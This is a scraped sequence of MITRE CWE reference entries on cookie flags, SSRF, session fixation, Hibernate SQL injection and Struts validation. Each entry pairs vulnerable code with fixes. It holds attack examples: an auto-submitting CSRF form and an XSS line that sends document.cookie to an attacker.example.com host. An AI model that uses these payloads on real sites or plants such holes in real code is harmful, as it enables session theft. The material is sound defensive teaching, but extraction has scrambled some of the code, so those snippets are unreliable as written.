weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This is related to CWE-300, although not all downgrade attacks necessarily require an entity that redirects or interferes with the network. See examples.
CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The snippet of code below, taken from a servlet doPost() method, sets an accountID cookie (sensitive) without calling setSecure(true). (bad code)
Example Language: Java
Cookie c = new Cookie(ACCOUNT_ID, acctID);
response.addCookie(c); Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1275: Sensitive Cookie with Improper SameSite Attribute
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
The SameSite attribute controls how cookies are sent for cross-domain requests. This attribute may have three values: 'Lax', 'Strict', or 'None'. If the 'None' value is used, a website may create a cross-domain POST HTTP request to another website, and the browser automatically adds cookies to this request. This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens).
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In this example, a cookie is used to store a session ID for a client's interaction with a website. The snippet of code below establishes a new cookie to hold the sessionID. (bad code)
Example Language: JavaScript
let sessionId = generateSessionId()
let cookieOptions = { domain: 'example.com' } response.cookie('sessionid', sessionId, cookieOptions) Since the sameSite attribute is not specified, the cookie will be sent to the website with each request made by the client. An attacker can potentially perform a CSRF attack by using the following malicious page: (attack code)
Example Language: HTML
<html>
<form id=evil action="http://local:3002/setEmail" method="POST">
<script>evil.submit()</script>
<input type="hidden" name="newEmail" value="abc@example.com" />
</form></html> When the client visits this malicious web page, it submits a '/setEmail' POST HTTP request to the vulnerable website. Since the browser automatically appends the 'sessionid' cookie to the request, the website automatically performs a 'setEmail' action on behalf of the client. To mitigate the risk, use the sameSite attribute of the 'sessionid' cookie set to 'Strict'. (good code)
Example Language: JavaScript
let sessionId = generateSessionId()
let cookieOptions = { domain: 'example.com', sameSite: 'Strict' } response.cookie('sessionid', sessionId, cookieOptions) Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client. The snippet of code below establishes a new cookie to hold the sessionID. (bad code)
Example Language: Java
String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID); response.addCookie(c); The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as: (attack code)
Example Language: JavaScript
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'
When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie. To mitigate the risk, use the setHttpOnly(true) method. (good code)
Example Language: Java
String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID); c.setHttpOnly(true); response.addCookie(c); Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-550: Server-generated Error Message Containing Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterCertain conditions, such as network failure, will cause a server error message to be displayed.
While error messages in and of themselves are not dangerous, per se, it is what an attacker can glean from them that might cause eventual problems.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-918: Server-Side Request Forgery (SSRF)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code intends to receive a URL from a user, access the URL, and return the results to the user. (bad code)
Example Language: PHP
$url = $_GET['url'];# User-controlled input
# Fetch the content of the provided URL $response = file_get_contents($url); echo $response; The given PHP code is vulnerable to Server-Side Request Forgery (SSRF) because it directly accepts a user-supplied URL from the $_GET['url'] parameter and fetches its content using file_get_contents(), without any validation or restrictions. This allows an attacker to request internal or restricted resources within the server's network, such as internal admin panels, cloud metadata endpoints, or local services running on localhost. (good code)
Example Language: PHP
# Define allowed URLs (or domains)
$allowed_urls = [ 'https://example.com/data.json', ];'https://api.example.com/info', # Get the user-provided URL $url = $_GET['url'] ?? ''; # Validate against allowed URLs if (!in_array($url, $allowed_urls)) { http_response_code(400); }echo "Invalid or unauthorized URL."; exit; # Fetch content safely $response = @file_get_contents($url); if ($response === false) { http_response_code(500); }echo "Failed to fetch content."; exit; echo htmlspecialchars($response);# Escape output for safety Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the "Server" portion of the SSRF acronym does not necessarily apply.
CWE-384: Session Fixation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterAuthenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.
Such a scenario is commonly observed when:
In the generic exploit of session fixation vulnerabilities, an attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to associate, and possibly authenticate, against the server using that session identifier, giving the attacker access to the user's account through the active session. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example shows a snippet of code from a J2EE web application where the application authenticates users with LoginContext.login() without first calling HttpSession.invalidate(). (bad code)
Example Language: Java
private void auth(LoginContext lc, HttpSession session) throws LoginException {
... }lc.login(); ... In order to exploit the code above, an attacker could first create a session (perhaps by logging into the application) from a public terminal, record the session identifier assigned by the application, and reset the browser to the login page. Next, a victim sits down at the same public terminal, notices the browser open to the login page of the site, and enters credentials to authenticate against the application. The code responsible for authenticating the victim continues to use the pre-existing session identifier, now the attacker simply uses the session identifier recorded earlier to access the victim's active session, providing nearly unrestricted access to the victim's account for the lifetime of the session. Even given a vulnerable application, the success of the specific attack described here is dependent on several factors working in the favor of the attacker: access to an unmonitored public terminal, the ability to keep the compromised session active and a victim interested in logging into the vulnerable application on the public terminal. In most circumstances, the first two challenges are surmountable given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, so long as the site is reasonably popular. The less well known the site is, the lower the odds of an interested victim using the public terminal and the lower the chance of success for the attack vector described above. The biggest challenge an attacker faces in exploiting session fixation vulnerabilities is inducing victims to authenticate against the vulnerable application using a session identifier known to the attacker. In the example above, the attacker did this through a direct method that is not subtle and does not scale suitably for attacks involving less well-known web sites. However, do not be lulled into complacency; attackers have many tools in their belts that help bypass the limitations of this attack vector. The most common technique employed by attackers involves taking advantage of cross-site scripting or HTTP response splitting vulnerabilities in the target site [12]. By tricking the victim into submitting a malicious request to a vulnerable application that reflects JavaScript or other code back to the victim's browser, an attacker can create a cookie that will cause the victim to reuse a session identifier controlled by the attacker. It is worth noting that cookies are often tied to the top level domain associated with a given URL. If multiple applications reside on the same top level domain, such as bank.example.com and recipes.example.com, a vulnerability in one application can allow an attacker to set a cookie with a fixed session identifier that will be used in all interactions with any application on the domain example.com [29]. Example 2 The following example shows a snippet of code from a J2EE web application where the application authenticates users with a direct post to the <code>j_security_check</code>, which typically does not invalidate the existing session before processing the login request. (bad code)
Example Language: HTML
<form method="POST" action="j_security_check">
<input type="text" name="j_username"> </form><input type="text" name="j_password"> Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
Other attack vectors include DNS poisoning and related network based attacks where an attacker causes the user to visit a malicious site by redirecting a request for a valid site. Network based attacks typically involve a physical presence on the victim's network or control of a compromised machine on the network, which makes them harder to exploit remotely, but their significance should not be overlooked. Less secure session management mechanisms, such as the default implementation in Apache Tomcat, allow session identifiers normally expected in a cookie to be specified on the URL as well, which enables an attacker to cause a victim to use a fixed session identifier simply by emailing a malicious URL.
CWE-334: Small Space of Random Values
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length. (bad code)
Example Language: XML
<sun-web-app>
...
<session-config> <session-properties>
<property name="idLengthBytes" value="8"> </session-properties><description>The number of bytes in this web module's session ID.</description> </property>... This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user's session. Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-564: SQL Injection: Hibernate
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterUsing Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "Weaknesses in OWASP Top Ten (2013)" (View-928)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt uses Hibernate's HQL syntax to build a dynamic query that's vulnerable to SQL injection. (bad code)
Example Language: Java
String street = getStreetFromUser();
Query query = session.createQuery("from Address a where a.street='" + street + "'");
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-219: Storage of File with Sensitive Data Under Web Root
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.
Besides public-facing web pages and code, products may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server. If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-104: Struts: Form Bean Does Not Extend Validation Class
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterIf a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user information from a registration webpage for an online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data. (bad code)
Example Language: Java
public class RegistrationForm extends org.apache.struts.action.ActionForm {
// private variables for registration form
private String name; private String email; ... public RegistrationForm() { super(); }// getter and setter methods for private variables ... However, the RegistrationForm class extends the Struts ActionForm class which does not allow the RegistrationForm class to use the Struts validator capabilities. When using the Struts framework to maintain user data in an ActionForm Bean, the class should always extend one of the validator classes, ValidatorForm, ValidatorActionForm, DynaValidatorForm or DynaValidatorActionForm. These validator classes provide default validation and the validate method for custom validation for the Bean object to use for validating input data. The following Java example shows the RegistrationForm class extending the ValidatorForm class and implementing the validate method for validating input data. (good code)
Example Language: Java
public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {
// private variables for registration form
private String name; private String email; ... public RegistrationForm() { super(); }public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} // getter and setter methods for private variables ... Note that the ValidatorForm class itself extends the ActionForm class within the Struts framework API.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-103: Struts: Incomplete validate() Method Definition
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and the RegistrationForm bean in the Struts framework will maintain the user data. Tthe RegistrationForm class implements the validate method to validate the user input entered into the form. (bad code)
Example Language: Java
public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {
// private variables for registration form
private String name; private String email; ... public RegistrationForm() { super(); }public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) { ActionErrors errors = new ActionErrors(); }if (getName() == null || getName().length() < 1) { errors.add("name", new ActionMessage("error.name.required")); }return errors; // getter and setter methods for private variables
